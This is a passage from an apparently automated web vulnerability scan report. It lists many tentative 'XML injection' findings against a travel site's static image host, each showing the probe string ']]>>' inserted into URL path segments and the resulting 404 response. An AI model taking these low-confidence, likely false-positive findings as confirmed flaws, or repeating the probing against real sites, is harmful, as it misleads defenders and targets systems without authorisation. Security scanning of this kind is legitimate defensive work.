Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details]]>>/tripadvisor-ratings/tripAdvisorRating.png?ver=222337 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:21 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.181. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png [REST URL parameter 5]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details/tripadvisor-ratings]]>>/tripAdvisorRating.png?ver=222337 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:24 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.182. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png [REST URL parameter 6]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png

Issue detail

The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png]]>>?ver=222337 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Expires: Mon, 03 Oct 2011 01:02:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:29 GMT
Content-Length: 1422
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.183. http://ak-static.hotwirestatic.com/static/images/map-console/icons/airport-icon.gif [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/map-console/icons/airport-icon.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/map-console/icons/airport-icon.gif?ver=-1 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:33 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.184. http://ak-static.hotwirestatic.com/static/images/map-console/icons/airport-icon.gif [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/map-console/icons/airport-icon.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/map-console/icons/airport-icon.gif?ver=-1 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535999
Date: Mon, 03 Oct 2011 01:02:37 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.185. http://ak-static.hotwirestatic.com/static/images/map-console/icons/airport-icon.gif [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/map-console/icons/airport-icon.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/map-console]]>>/icons/airport-icon.gif?ver=-1 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535999
Date: Mon, 03 Oct 2011 01:02:39 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.186. http://ak-static.hotwirestatic.com/static/images/map-console/icons/airport-icon.gif [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/map-console/icons/airport-icon.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/map-console/icons]]>>/airport-icon.gif?ver=-1 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535998
Date: Mon, 03 Oct 2011 01:02:42 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.187. http://ak-static.hotwirestatic.com/static/images/map-console/icons/airport-icon.gif [REST URL parameter 5]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/map-console/icons/airport-icon.gif

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/map-console/icons/airport-icon.gif]]>>?ver=-1 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Expires: Mon, 03 Oct 2011 01:02:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:43 GMT
Content-Length: 1422
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.188. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.0.gif [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/review-rating-symbols/3.0.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/review-rating-symbols/3.0.gif?ver=146387 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:56 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.189. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.0.gif [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/review-rating-symbols/3.0.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/review-rating-symbols/3.0.gif?ver=146387 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535967
Date: Mon, 03 Oct 2011 01:01:58 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.190. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.0.gif [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/review-rating-symbols/3.0.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/review-rating-symbols]]>>/3.0.gif?ver=146387 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535968
Date: Mon, 03 Oct 2011 01:02:02 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.191. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.0.gif [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/review-rating-symbols/3.0.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/review-rating-symbols/3.0.gif]]>>?ver=146387 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:06 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.192. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.5.gif [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/review-rating-symbols/3.5.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/review-rating-symbols/3.5.gif?ver=146387 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:54 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.193. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.5.gif [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/review-rating-symbols/3.5.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/review-rating-symbols/3.5.gif?ver=146387 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:58 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.194. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.5.gif [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/review-rating-symbols/3.5.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/review-rating-symbols]]>>/3.5.gif?ver=146387 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:01 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.195. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.5.gif [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/review-rating-symbols/3.5.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/review-rating-symbols/3.5.gif]]>>?ver=146387 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:04 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.196. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/4.0.gif [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/review-rating-symbols/4.0.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/review-rating-symbols/4.0.gif?ver=146387 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535955
Date: Mon, 03 Oct 2011 01:01:56 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.197. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/4.0.gif [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/review-rating-symbols/4.0.gif

Issue detail

